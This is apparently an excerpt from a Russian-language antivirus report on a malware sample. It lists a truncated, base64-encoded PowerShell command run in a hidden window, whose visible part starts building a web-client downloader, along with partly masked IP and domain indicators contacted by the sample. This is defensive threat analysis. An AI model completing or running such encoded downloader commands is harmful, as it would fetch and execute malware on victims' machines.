Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEADMAXwBfADAANwA9ACgAJwBFAF8AJwArACcAMgAnACsAJwAyADEAMAAnACkAOwAkAEYAXwA2AF8ANgBfADEANgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABZAF8AXwAxADAAMwA1ADIAPQAoAC...
- '16#.#27.119.146':80
- DNS ASK th###birang.com
- DNS ASK tr#########.dev.trestristestigres.com
- DNS ASK da####etke.com.vn
- DNS ASK av#####taudes.com.mx
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEADMAXwBfADAANwA9ACgAJwBFAF8AJwArACcAMgAnACsAJwAyADEAMAAnACkAOwAkAEYAXwA2AF8ANgBfADEANgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABZAF8AXwAxADAAMwA1ADIAPQAoAC...' (со скрытым окном)